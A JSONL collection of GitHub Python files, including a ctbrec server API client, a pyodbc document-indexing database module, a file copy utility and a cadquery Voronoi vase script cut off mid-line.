+{"seq_id":"5221985400","text":"import codecs\nimport os\nimport time\nimport argparse\n\n\n\"\"\"No that the TF-IDF retriever RetrieverProcess cannot retrieve when there are less than 3 files in MyCorpus, this file is to address this issue.\"\"\"\n\"\"\"Will be diged into.\"\"\"\n\n\ndef create_Notselected_files(filepath):\n if not os.path.isfile(filepath):\n with codecs.open(filepath, 'w+', encoding='utf8') as fp:\n fp.write(\"I'm pretty sure that it is not the answer.\")\n\ndef create_Notselected_file(corpus_path):\n ctime = str(int(round(time.time() * 1000)))\n num_of_files = len([name for name in os.listdir(corpus_path) if os.path.isfile(name)])\n if num_of_files < 3:\n # print(\"11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\")\n create_Notselected_files(corpus_path + ctime + \"1\" + \".txt\")\n create_Notselected_files(corpus_path + ctime + \"2\" + \".txt\")\n create_Notselected_files(corpus_path + ctime + \"3\" + \".txt\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('MyCorpus_path', type=str, help='MyCorpus/')\n args = parser.parse_args()\n create_Notselected_file(args.MyCorpus_path)\n","repo_name":"Mohan-Zhang-u/NLPDemoServer","sub_path":"MyFlaskBackEnd/MyQA/FillInRandomFilesIfNeeded.py","file_name":"FillInRandomFilesIfNeeded.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6081260166","text":"\"\"\" Simple python client for programmatic interaction with the CTBREC server\n\n###################################################################################\nWARNING - Make a backup of your server.json file before using the CtbRec class !!!!\n###################################################################################\n\nCTBREC server functionality that is exposed includes:\n* querying server state\n* updating server settings\n* getting/adding/modifying/deleting models\n* getting/adding/modifying/deleting model-groups\n* getting/deleting/post-processing recordings\n\nTested with ctbrec-server version 4.7.4, and Python version 3.9\n\"\"\"\n\nimport json\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import Union, Mapping, Optional\nimport uuid\nimport re\nimport hmac\nimport hashlib\nimport warnings\n\nfrom urllib3.exceptions import InsecureRequestWarning\nimport requests\n\n\nclass CtbRecRequestFailed(Exception):\n \"\"\" Exception to be raised if ctbrec server returns status=='fail' \"\"\"\n pass\n\n\nclass CtbRecInvalidModelDefinition(Exception):\n \"\"\" Exception to be raised model definition doesn't conform to recognised pattern \"\"\"\n pass\n\n\nclass CtbRecNotFound(Exception):\n \"\"\" Exception to be raised if an attempt to match a model or group on the server fails \"\"\"\n pass\n\n\nclass CtbRecAlreadyExists(Exception):\n \"\"\" Exception to be raised if an attempt is made to create a model-group that already exists\"\"\"\n pass\n\n\nclass CtbRec:\n \"\"\"\n Simple Python interface to the awesome ctbrec-server\n \"\"\"\n\n # basic regular expressions for model strings/urls\n regex = {\n 'url': re.compile('https?://'),\n 'site_name': re.compile(r'[A-Z]\\w+:[\\w-]+'),\n 'domain_name': re.compile(r'https?://([\\w-]+\\.)*([\\w-]+\\.[\\w-]+)/([\\w-]+/)*(.*)/?$'),\n 'model_type': re.compile(r'ctbrec\\.sites\\.[\\w]+\\.([\\w]+)Model')\n }\n\n class ModelType(Enum):\n \"\"\" used for identifying model input type \"\"\"\n url = 1\n site_name = 2\n model_dict = 3\n\n def __init__(self, server_url: str, username: str = None, password: str = None, verify: Union[bool, str] = False):\n \"\"\"\n Initialise server connection\n\n Args:\n server_url: url of the ctbrec server, eg https://localhost:8443\n username: optional ctbrec server username Default is None\n password: optional ctbrec server password Default is None\n verify: Passed through to requests.Session for server ssl certificate handling. Default is False.\n \"\"\"\n # ignore insecure request warnings when tls is being used\n warnings.simplefilter(action='ignore', category=InsecureRequestWarning)\n # initialise connection parameters\n self.server_url = server_url.strip(\"/\")\n self.session = requests.Session()\n if username is not None or password is not None:\n self.session.auth = (username, password)\n self.session.verify = verify\n self.session.headers.update({'X-Requested-With': 'XMLHttpRequest'})\n # get hmac key\n hmac_req = self.session.get(self.server_url+'/secured/hmac')\n if hmac_req.status_code == 200 and len(hmac_req.text) > 0:\n self.hmac_key = json.loads(hmac_req.text)['hmac'].encode('utf-8')\n else:\n self.hmac_key = b''\n # keep copy of initial server config\n self.initial_config = self.get_settings()\n self.initial_models = self.get_models()\n self.initial_model_groups = self.get_model_groups()\n\n # ----------------------------------------- model methods ---------------------------------------------------------\n def get_models(self, online: bool = False) -> Mapping[str, dict]:\n \"\"\"\n Get a list of all models on the server\n\n Args:\n online: if True then only retrieve online models else return all models. Default is False.\n Returns:\n dict of models where key is Site:ModelName\n Raises:\n CtbRecRequestFailed\n \"\"\"\n ml = self.send_request(url='/rec', data={'action': 'listOnline' if online else 'list'})['models']\n return {self.model_id(m): m for m in ml}\n\n def get_model_status(self) -> Mapping[str, str]:\n \"\"\"\n Get status code for all models\n\n Returns: dict with status for each Site:Model. Status can be one of\n [\"recording\", \"online\", \"offline\", \"paused\", \"later\"]\n Raises:\n CtbRecRequestFailed\n \"\"\"\n m = self.get_models()\n o = self.get_models(online=True)\n r = self.get_recordings()\n result = dict.fromkeys(m.keys(), 'offline')\n result.update(dict.fromkeys(o.keys(), 'online'))\n result.update(dict.fromkeys({self.model_id(i['model']) for i in r if i['status'] == 'RECORDING'}, 'recording'))\n result.update(dict.fromkeys({k for k, v in m.items() if v['markedForLater']}, 'later'))\n result.update(dict.fromkeys({k for k, v in m.items() if v['suspended']}, 'paused'))\n return result\n\n def add_model(self, model: Union[str, dict], props: dict = None) -> dict:\n \"\"\"\n Add a model to the server\n\n Args:\n model: one of [url[str], Site:Name[str], ModelDict[dict]]\n props: optional dict of one or more model definition items to update in model. These can include;\n 'priority' (integer), 'markedForLater' (True|False), 'suspended' (True|False),\n 'recordUntil' (int), 'recordUntilSubsequentAction' (string).\n Returns:\n The model dict if successfully added\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n if props:\n props = self.parse_model_props(props)\n\n # determine model specification type\n mt = self.parse_model_type(model)\n if mt == self.ModelType.model_dict:\n model = self.parse_model_props(model)\n if props:\n model.update(props)\n data = {'action': 'start', 'model': model}\n elif mt == self.ModelType.site_name:\n data = {'action': 'startByName', 'model': {\"type\": None, \"name\": \"\", \"url\": model}}\n elif mt == self.ModelType.url:\n data = {'action': 'startByUrl', 'model': {\"type\": None, \"name\": \"\", \"url\": model}}\n else:\n data = {} # should never reach here because parse_model_type will raise an exception\n # query the server\n self.send_request(\"/rec\", data=data)\n # retrieve model back from server\n m = self.find_model(model)\n # update model dict with optional additional properties\n if props and mt != self.ModelType.model_dict:\n m = self.update_model(m, props)\n return m\n\n def add_models(self, models: list[Union[str, dict]], props: dict = None) -> list:\n \"\"\"\n suspended=False, later=False, stop_action = 'PAUSE',\n\n Add a list of models to the server, catching any exceptions\n\n Args:\n models: a list of model definitions - one of [url[str], Site:Name[str], ModelDict[dict]]\n props: optional dict of one or more model definition items that will be applied to all models.\n These can include;\n 'priority' (int), 'markedForLater' (bool), 'suspended' (bool),\n 'recordUntil' (int|datetime), 'recordUntilSubsequentAction' (str).\n Returns:\n A list of any models successfully added\n \"\"\"\n models_added = []\n for m in models:\n try:\n models_added.append(self.add_model(m, props))\n except (CtbRecRequestFailed, CtbRecInvalidModelDefinition) as error:\n warnings.warn(f'Unable to add {m} to server: {error}')\n except CtbRecNotFound:\n warnings.warn(f'{m} added but could not be matched on server')\n return models_added\n\n def update_model(self, model: Union[str, dict], props: dict) -> dict:\n \"\"\" Update properties for an existing model on the server\n\n Args:\n model: one of [url[str], Site:Name[str], ModelDict[dict]]\n props: dict of one or more model definition items to update in model. These can include;\n 'priority' (int), 'markedForLater' (bool), 'suspended' (bool),\n 'recordUntil' (int|datetime), 'recordUntilSubsequentAction' (str).\n Returns:\n The updated model dict\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n props = self.parse_model_props(props)\n mt = self.parse_model_type(model)\n m = model if mt == self.ModelType.model_dict else self.find_model(model)\n invalid_keys = [k for k in props if k not in m]\n if invalid_keys:\n warnings.warn(f'Invalid properties {\",\".join(invalid_keys)} will be ignored.')\n p = {k: v for k, v in props.items() if k in m}\n if m and p:\n m.update(p)\n self.send_request(\"/rec\", data={\"action\": \"start\", \"model\": m})\n return self.find_model(m)\n warnings.warn(\"Failed to update model properties\")\n return dict()\n\n def remove_model(self, model: Union[str, dict]):\n \"\"\" Delete a model from recording list on the server\n\n Args:\n model: one of [url[str], Site:Name[str], ModelDict[dict]]\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={\"action\": \"stop\", \"model\": self.find_model(model)})\n\n def remove_models(self, models: list[Union[str, dict]]) -> list[Union[str, dict]]:\n \"\"\" Delete a list of models from the server, catching any exceptions\n\n Args:\n models: list of models where elements must be one of [url[str], Site:Name[str], ModelDict[dict]]\n Returns:\n a list of any input models that failed to be removed\n \"\"\"\n failed = []\n for m in models:\n try:\n self.remove_model(m)\n except (CtbRecRequestFailed, CtbRecInvalidModelDefinition, CtbRecNotFound) as error:\n failed.append(m)\n warnings.warn(f'Unable to remove {m} from server: {error}')\n return failed\n\n def find_model(self, model: Union[str, dict]) -> dict:\n \"\"\" get an existing model on the server by matching model input\n\n Args:\n model: string|dict - a ctbrec model definition\n Returns:\n model dict if model found on server\n Raises:\n CtbRecInvalidModelDefinition\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n models = self.get_models()\n mt = self.parse_model_type(model)\n if mt == self.ModelType.model_dict:\n match = [m for m in models.values() if m['type'] == model['type'] and m['name'] == model['name']]\n elif mt == self.ModelType.url:\n match = [m for m in models.values() if self.url_match(m['url'], model)]\n elif mt == self.ModelType.site_name and model in models:\n match = [models[model]]\n else:\n match = []\n if match:\n return match[0]\n raise CtbRecNotFound(\"Requested model could not be found on server.\")\n\n # ----------------------------------------- model group methods ----------------------------------------------------\n def get_model_groups(self) -> Mapping[str, dict]:\n \"\"\"\n Get a dict of all model groups currently on the server\n\n Returns:\n dict keyed by group-name, containing all model group dicts on the server. Model groups contain keys\n [\"name\", \"modelUrls\", \"id\"]\n \"\"\"\n g = self.send_request(url='/rec', data={'action': 'listModelGroups'})['groups']\n return {v['name']: v for v in g}\n\n def delete_model_group(self, group: Union[dict, str]):\n \"\"\"\n Delete a model group from the server\n\n Args:\n group: a group dict, or group name identifying the group to be deleted\n Raises:\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n if isinstance(group, str):\n g = self.find_model_group(group)\n else:\n g = group\n self.send_request(url='/rec', data={'action': 'deleteModelGroup', 'modelGroup': g})\n\n def save_model_group(self, group: dict):\n \"\"\"\n Save a model group to the server. This will overwrite any existing information in the group.\n\n Args:\n group: the group dict to be saved\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'saveModelGroup', 'modelGroup': group})\n\n def add_models_to_group(self, group: Union[dict, str], model_list: list[Union[dict, str]]) -> dict:\n \"\"\"\n Add models to an existing model group.\n\n Args:\n group: either a group name or a group dict, specifying an existing model group that is to be updated.\n model_list: a list of models where list items can be either au url string, or a model dict.\n Returns:\n The updated model group retrieved back from the server\n Raises:\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n if isinstance(group, str):\n group = self.find_model_group(group)\n ml = {m if isinstance(m, str) else m['url'] for m in model_list}\n group['modelUrls'].extend(list(ml))\n self.save_model_group(group)\n return self.get_model_groups()[group['name']]\n\n def remove_models_from_group(self, group: Union[dict, str], model_list: list[Union[dict, str]]):\n \"\"\"\n Remove models from an existing model group.\n\n Args:\n group: either a group name or a group dict, specifying an existing model group that is to be updated.\n model_list: a list of models where list items can be either an url string, or a model dict.\n Returns:\n The updated model group retrieved back from the server\n Raises:\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n if isinstance(group, str):\n group = self.find_model_group(group)\n ml = {m if isinstance(m, str) else m['url'] for m in model_list}\n group['modelUrls'] = [m for m in group['modelUrls'] if m not in ml]\n self.save_model_group(group)\n return self.get_model_groups()[group['name']]\n\n def create_model_group(self, name: str, model_list: list) -> dict:\n \"\"\"\n Create a new model group on the server\n\n Args:\n name: a string specifying name of the new group. Must be unique.\n model_list: a list of models where list items can be either an url string, or a model dict\n Returns:\n dict containing keys 'status' ('success' or 'fail') and 'msg'\n Raises:\n CtbRecAlreadyExists\n CtbRecRequestFailed\n CtbRecNotFound\n \"\"\"\n groups = self.get_model_groups()\n if name in groups:\n raise CtbRecAlreadyExists(f'Model group {name} already exists')\n ml = {m if isinstance(m, str) else m['url'] for m in model_list} # use set to reduce to unique urls\n self.save_model_group({\"name\": name, 'modelUrls': list(ml), 'id': uuid.uuid4().__str__()})\n return self.get_model_groups()[name]\n\n def find_model_group(self, name: str) -> dict:\n \"\"\"\n Retrieve an existing model group from the server by name\n\n Args:\n name: a string specifying name of the new group.\n Returns:\n Model-group dict\n Raises:\n CtbRecNotFound\n CtbRecRequestFailed\n \"\"\"\n groups = self.get_model_groups()\n if name in groups:\n return groups[name]\n raise CtbRecNotFound(f'Model group {name} could not be found on the server')\n \n # --------------------------------------- recording methods -------------------------------------------------------\n def get_recordings(self) -> list[dict]:\n \"\"\"\n Get a list of all recordings from the server\n\n Returns:\n list of recording dicts\n Raises:\n CtbRecRequestFailed\n \"\"\"\n return self.send_request(url='/rec', data={'action': 'recordings'})['recordings']\n\n def delete_recording(self, recording: dict):\n \"\"\"\n **Permanently** delete a recoding on server\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'delete', 'recording': recording})\n\n def pin_recording(self, recording: dict):\n \"\"\"\n Pin a recoding on the server\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'pin', 'recording': recording})\n\n def unpin_recording(self, recording: dict):\n \"\"\"\n Unpin a recoding on the server\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'unpin', 'recording': recording})\n\n def annotate_recording(self, recording: dict, note: str):\n \"\"\"\n Add a note to a recoding on the server\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n recording['note'] = note\n self.send_request(url='/rec', data={'action': 'setNote', 'recording': recording})\n\n def rerun_post_process(self, recording: dict):\n \"\"\"\n Rerun post-processing for a recording\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'rerunPostProcessing', 'recording': recording})\n\n # --------------------------------------- general server methods ---------------------------------------------------\n def get_settings(self) -> list:\n \"\"\" Get current server settings\n\n Returns:\n list of current server settings\n Raises:\n CtbRecRequestFailed\n \"\"\"\n return self.send_request(url='/config')\n\n def update_settings(self, settings: Union[dict, list]) -> list:\n \"\"\" Update server config settings\n\n Args:\n settings: either a dict of key-value pairs where keys must be valid ctbrec setting keys and values must\n conform to expected type, or a list of ctbrec settings.\n Returns:\n list of server settings after updates have been applied\n Raises:\n CtbRecRequestFailed\n \"\"\"\n if isinstance(settings, dict):\n data = {s['key']: s for s in self.get_settings()}\n for k in settings:\n if k not in data.keys():\n warnings.warn(f'{k} is not a valid settings key and will be ignored')\n data[k]['value'] = settings[k]\n data = list(data.values())\n else:\n data = settings\n self.send_request(url='/config', data=data)\n return self.get_settings()\n\n def get_space(self) -> dict:\n \"\"\" Get drive space statistics from server\n\n Returns:\n dict of drive space statistics\n Raises:\n CtbRecRequestFailed\n \"\"\"\n return self.send_request(url='/rec', data={'action': 'space'})\n\n def get_summary(self) -> dict:\n \"\"\" Get summary of server activity\n\n Returns:\n dict of drive space statistics\n Raises:\n CtbRecRequestFailed\n \"\"\"\n models = self.get_models()\n paused = len([m for m in models.values() if m['suspended']])\n later = len([m for m in models.values() if m['markedForLater']])\n online = len(self.get_models(online=True))\n recordings = self.get_recordings()\n recording = len([r for r in recordings if r['status'] == 'RECORDING'])\n post_process = len([r for r in recordings if r['status'] == 'POST_PROCESSING'])\n space = self.get_space()\n return {\"total_models\": len(models), \"models_recording\": recording, \"models_online\": online,\n \"models_paused\": paused, \"models_marked_later\": later, \"total_recordings\": len(recordings),\n \"post_processing\": post_process,\n \"space_used\": f\"{round((space['spaceTotal']-space['spaceFree'])/1e9,3)} GB\",\n \"space_free\": f\"{round(space['spaceFree']/1e9,3)} GB\"}\n\n def pause_recording(self):\n \"\"\" Suspend all recoding on the server\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'pauseRecorder'})\n\n def resume_recording(self):\n \"\"\" Resume all recoding on the server\n\n Raises:\n CtbRecRequestFailed\n \"\"\"\n self.send_request(url='/rec', data={'action': 'resumeRecorder'})\n\n\n # ------------------------------------------- internal methods -----------------------------------------------------\n def type_to_site(self, model_type: str) -> str:\n \"\"\"\n Get ctbrec site code from ctbrec site class name\n\n Args:\n model_type: str containing ctbrec model type code\n \"\"\"\n return re.findall(self.regex['model_type'], model_type)[0]\n\n def parse_model_props(self, props: dict) -> dict:\n \"\"\"\n Process model properties. At the moment this only adjusts 'recordUntil' if it is specified as a datetime or\n in hours.\n\n Args:\n props: dict containing model properties\n Returns:\n model dict after converting recordUntil to a timestamp\n \"\"\"\n p = props\n if p and 'recordUntil' in p:\n record_until = p['recordUntil']\n if isinstance(record_until, datetime):\n p['recordUntil'] = round(record_until.timestamp()*1000)\n elif isinstance(record_until, int) and record_until < 10000: # assume it is specified in hours\n p['recordUntil'] = round(datetime.now().timestamp()*1000 + record_until*3600000)\n return p\n\n def model_id(self, model: dict) -> str:\n \"\"\"\n Get model id from model dict. Id is Site:ModelName\n\n Args:\n model: ctbrec model dict\n \"\"\"\n return re.findall(self.regex['model_type'], model['type'])[0] + ':' + model['name']\n\n def url_match(self, url1: str, url2: str) -> bool:\n \"\"\" Check if two urls match, either exact match or by top level domain and name\n\n This makes the assumption that model name is the last string in the url, which seems to be the case at the\n moment, may not always be true in the future\n \"\"\"\n u1 = url1.strip().rstrip('/')\n u2 = url2.strip().rstrip('/')\n if u1 == u2:\n return True\n u1g = re.findall(self.regex['domain_name'], u1)[0]\n u2g = re.findall(self.regex['domain_name'], u2)[0]\n return u1g[1] == u2g[1] and u1g[3] == u2g[3]\n\n def parse_model_type(self, model: Union[str, dict]) -> ModelType:\n \"\"\" Determine model request type from model input \"\"\"\n if isinstance(model, dict) and all(k in model for k in ['type', 'name', 'url']):\n return self.ModelType.model_dict\n elif isinstance(model, str) and re.match(self.regex['url'], model):\n return self.ModelType.url\n elif isinstance(model, str) and re.match(self.regex['site_name'], model):\n return self.ModelType.site_name\n raise CtbRecInvalidModelDefinition(\"Model must be one of [url[str], Site:Name[str], ModelDict[dict]]\")\n\n def send_request(self, url: str, data: Optional[Union[dict, list]] = None) -> Union[dict, list]:\n \"\"\" Send a request to the ctbrec server\n\n Args:\n url: string - relative url for the request, eg. '/rec'\n data: dict - payload to send to server. If None then GET will be used rather than POST\n Return:\n server result data structure\n Raises:\n CtbRecRequestFailed\n \"\"\"\n data_str = '' if data is None else json.dumps(data)\n data_hmac = hmac.new(self.hmac_key, data_str.encode('utf-8'), hashlib.sha256).hexdigest()\n self.session.headers.update({'CTBREC-HMAC': data_hmac})\n if data is None:\n result = self.session.get(self.server_url + url)\n else:\n result = self.session.post(self.server_url+url, data=data_str)\n if result.status_code == 200:\n result_json = json.loads(result.text)\n if isinstance(result_json, dict) and result_json['status'] != \"success\":\n raise CtbRecRequestFailed(f\"Request failed: {result_json['msg']}\")\n else:\n return result_json\n else:\n raise CtbRecRequestFailed(f'HTTP error: {result.status_code} : {result.reason} : {result.text}')\n","repo_name":"Jafea7/ctbrec-debian","sub_path":"rootfs/app/ctbrec.py","file_name":"ctbrec.py","file_ext":"py","file_size_in_byte":24982,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"2374604254","text":"\"\"\"\ndatabase functionality\n\"\"\"\n\n# Python Core Imports\nimport datetime\nimport pandas as pd\n\n# Third Party Imports\nimport pyodbc\nfrom flask import g, current_app as app\n\n# Application Imports\nfrom utils import label_sentences\n\n\ndef create_connection():\n connection = pyodbc.connect(Driver= app.config['DATABASE_DRIVER'], Server= app.config['DATABASE_HOST'], Database= app.config['DATABASE_NAME'], uid= app.config['UID'], pwd= app.config['PWD'])\n return connection\n\n\ndef get_db():\n if 'db' not in g:\n g.db = create_connection()\n\n return g.db\n\n\ndef file_order_info(file_Order_Id):\n \"\"\"\n returns file order info for given file order id\n \"\"\"\n conn = get_db()\n customer_id, customer_order_id, file_name = None, None, None\n query = 'EXEC [dbo].[SP_GetFileOrder] @FileOrderID = {0}'.format(file_Order_Id)\n file_order = pd.read_sql(query, conn)\n if not file_order.empty:\n customer_id, customer_order_id, file_name = str(file_order.CustomerID.values[0]), str(file_order.CustomerOrderID.values[0]), str(file_order.FileName.values[0])\n return customer_id, customer_order_id, file_name\n\n\ndef file_page_text_info(file_order_id):\n \"\"\"\n returns file page text for given file order id\n \"\"\"\n conn = get_db()\n x_test, y_test, data = None, None, None\n query = 'EXEC [dbo].[GET_FilePageTextByOrderId] @FileOrderID = {0}'.format(file_order_id)\n dataset = pd.read_sql(query, conn)\n if not dataset.empty:\n x_test, y_test = dataset.PageText.values, dataset.DocumentIdentifierID.values\n data = label_sentences(x_test, y_test,'Test')\n return data, y_test\n\n\ndef client_document_names(customer_id):\n \"\"\"\n mapping for ML trained and document identifier ids and names dictionary for given client id\n \"\"\"\n conn = get_db()\n ml_docs_ids = None\n docs_names = None\n query = 'EXEC [dbo].[Get_MLSpecificDocumentsByClient] @CustomerID = {0}'.format(customer_id)\n dataset = pd.read_sql(query, conn)\n if not dataset.empty:\n ml_docs_ids = dataset.loc[:, ['MLDocumentID','DocumentIdentifierID']].set_index('MLDocumentID').to_dict()['DocumentIdentifierID']\n docs_names = dataset.loc[:, ['DocumentIdentifierID','DocumentName']].set_index('DocumentIdentifierID').to_dict()['DocumentName']\n return ml_docs_ids, docs_names\n\n\ndef insert_indexing_result(res, file_Order_Id):\n \"\"\"\n inserts resultant documents into indexing result\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n crsr.fast_executemany = True\n sql = \"INSERT INTO IndexingResult(FileOrderID, DocumentIdentifierID, DocumentName, PageFrom, PageTo, PageCount, Accuracy_Level) VALUES(?,?,?, ?,?,?,?)\"\n params = [(file_Order_Id, r.Document_Id, r.Document_Name, r.Page_From, r.Page_To, r.Page_Count, r.Accuracy,) for r\n in res]\n crsr.executemany(sql, params)\n cnxn.commit()\n\n\ndef update_file_page_text_with_customer_order_id(res, file_Order_Id, customer_id, customer_order_id):\n \"\"\"\n updates file page text attributes for indexing results\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n crsr.fast_executemany = True\n\n sql = \"UPDATE FilePageText SET DocumentID = ?, DocumentName=?, CustomerID=?, CustomerOrderID=? Where FileOrderID = ? and PageNumber >= ? and PageNumber <= ?\"\n params = [[r.Document_Id, r.Document_Name, customer_id, customer_order_id, file_Order_Id, r.Page_From, r.Page_To]\n for r in res]\n crsr.executemany(sql, params)\n cnxn.commit()\n\n\ndef update_file_page_text(res, file_Order_Id, customer_id):\n \"\"\"\n updates file page text attributes for indexing results\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n crsr.fast_executemany = True\n\n sql = \"UPDATE FilePageText SET DocumentID = ?, DocumentName=?, CustomerID=? Where FileOrderID = ? and PageNumber >= ? and PageNumber <= ?\"\n params = [[r.Document_Id, r.Document_Name, customer_id, file_Order_Id, r.Page_From, r.Page_To] for r in res]\n crsr.executemany(sql, params)\n cnxn.commit()\n\n\ndef insert_into_logs(file_Order_Id, log_type, message):\n \"\"\"\n inserts file order log\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = 'exec [dbo].[SP_Logs_Insert] ?, ?, ?, ?, ?, ?'\n values = (file_Order_Id, datetime.datetime.now(), log_type, message, 0, 0)\n crsr.execute(sql, (values))\n cnxn.commit()\n\n\ndef update_indexed_document_counts_in_file_order(file_Order_Id, indexed_docs):\n \"\"\"\n count of indexed documets against file order id\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = 'exec [dbo].[Update_Indexed_Document_Counts] ?, ?'\n values = (file_Order_Id, indexed_docs)\n crsr.execute(sql, (values))\n cnxn.commit()\n\n\ndef insert_into_processed_order_logs(file_Order_Id, ml_model_time, total_indexing_time):\n \"\"\"\n insert ML model time and total indexing time by ML api\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = 'exec [dbo].[InsertModelAndIndexingTimeByML] ?, ?, ?'\n values = (file_Order_Id, \"{0:.2f}\".format(ml_model_time), \"{0:.2f}\".format(total_indexing_time))\n crsr.execute(sql, (values))\n cnxn.commit()\n\n\ndef delete_existing_file_Order_log(file_order_Id):\n \"\"\"\n deletes from file order log\n \"\"\"\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = \"DELETE FROM fileorderlog where FileOrderID = ?\"\n params = (file_order_Id,)\n crsr.execute(sql, params)\n cnxn.commit()\n\n\ndef insert_file_Order_log(file_Order_Id, order_log):\n \"\"\"\n inserts file order log\n \"\"\"\n delete_existing_file_Order_log(file_Order_Id)\n cnxn = get_db()\n crsr = cnxn.cursor()\n sql = \"INSERT INTO fileorderlog(FileOrderID, OrderLog) VALUES(?,?)\"\n params = (file_Order_Id, order_log,)\n crsr.execute(sql, params)\n cnxn.commit()\n","repo_name":"RizwanLiaqatButt/ML-Py","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73624233764","text":"import time\nimport os\nimport shutil\n\n\ndef check_path(input_file, output_path):\n '''\n Make sure input path exists\n and output path exsits, if not creat one\n '''\n try:\n # If input file exists\n if os.path.isfile(input_file):\n # If output path exists\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n return True, ''\n else:\n # If file exists in output check_path\n filename = os.path.basename(inputfile)\n output_file = os.path.join(output_path, filename)\n if os.path.exists(output_file):\n return False, 'ERROR:output file already exists !'\n\n else:\n return True, ''\n else:\n return False, 'ERROR:input file not exists !'\n\n except Exception as e:\n return False, e\n\n\ndef file_copy(input_file, output_path, size):\n '''\n 1kB = 1024B\n 1B = 8b\n '''\n start_time = time.time()\n with open(input_file, 'rb') as f:\n # Get size of file\n final_pos = f.seek(0, 2)\n\n pos = 0\n while pos < f.seek(0, 2):\n f.seek(pos,0)\n data = f.read(size)\n\n with open(output_path, 'ab') as fw:\n fw.write(data)\n # print(pos, data)\n pos += size\n\n end_time = time.time()\n run_time = end_time - start_time\n data = float('%.2f' % run_time)\n\n return True, data\n\n\ndef file_transfer(input_file, output_path):\n\n # Copy file\n filename = os.path.basename(input_file)\n output_file = os.path.join(output_path,filename)\n if not os.path.exists(output_file):\n shutil.copyfile(input_file, output_file)\n print('finish')\n\n\nif __name__ == '__main__':\n inputfile = r'D:\\Cedric\\TD\\Tools\\file_transfer\\Test\\test.mp4'\n outputpath = r'D:\\Cedric\\TD\\Tools\\file_transfer\\Test'\n size = 46593\n\n print(check_path(inputfile, outputpath))\n # file_transfer(inputfile,outputpath)\n\n # print (file_copy(inputfile, outputpath, size))\n print ()\n","repo_name":"CedricMx/Tools","sub_path":"file_transfer/file_transfer.py","file_name":"file_transfer.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70218585446","text":"# Scipy 1.6 or later is required.\n# not stable, float-error problems? \n# Keep on trying until you make it ... XD\n\nfrom random import random\nimport numpy\nfrom scipy import spatial\nfrom cadquery import Vector\nfrom cqmore import Workplane\nfrom cqmore.matrix import translation, scaling\nfrom cqmore.polygon import regularPolygon\nfrom cqmore.polyhedron import sweep\n\ndiameter = 90\nsides = 12\nheight = 120\nthickness = 2\nstep = 30\n\ndef voronoi_vase(diameter, sides, height, thickness, step):\n def sided_vase(diameter, sides, height):\n r = diameter / 2\n\n half_height = height / 2\n radii = [r * 0.5, r * 0.8, r, r * 0.875, r * 0.725, r * 0.625, r * 0.6, r * 0.75]\n h_step = height / len(radii)\n sections = []\n for i in range(len(radii)):\n polygon = regularPolygon(sides, radii[i])\n sections.append([(p[0], p[1], -half_height + h_step * i) for p in polygon])\n \n return Workplane().polyhedron(*sweep(sections))\n\n def random_points(diameter, height, step):\n random_scale = step / 2\n double_step = step * 2\n half_random_scale = random_scale / 2\n x_offset = -diameter / 2 - half_random_scale\n y_offset = -diameter / 2 - half_random_scale\n z_offset = -height / 2 - half_random_scale\n\n points = []\n for x in range(-double_step, diameter + double_step, step):\n for y in range(-double_step, diameter + double_step, step):\n for z in range(-double_step, height + double_step, step):\n points.append([\n x_offset + x + random() * random_scale, \n y_offset + y + random() * random_scale, \n z_offset + z + random() * random_scale]\n )\n return points\n \n def voronoiConvexs(diameter, height, thickness, step):\n voronoi = spatial.Voronoi(random_points(diameter, height, step))\n vertices = numpy.around(voronoi.vertices, 5)\n\n s = (step - thickness) / step\n m_scaling = scaling((s, s, s))\n\n convex = Workplane()\n convexs = Workplane()\n for region_i in voronoi.point_region:\n region = voronoi.regions[region_i]\n region_vts = [Vector(*vertices[i]) for i in region if i != -1]\n geom_center = sum(region_vts, Vector()) / len(region_vts)\n m = translation(geom_center.toTuple()) @ m_scaling @ translation((-geom_center).toTuple())\n transformed = m.transformAll(v.toTuple() for v in region_vts)\n convexs.add(convex.hull(transformed))\n\n return convexs\n\n vase = sided_vase(diameter, sides, height)\n\n outerShell = vase.faces('+Z').shell(thickness)\n innerShell = 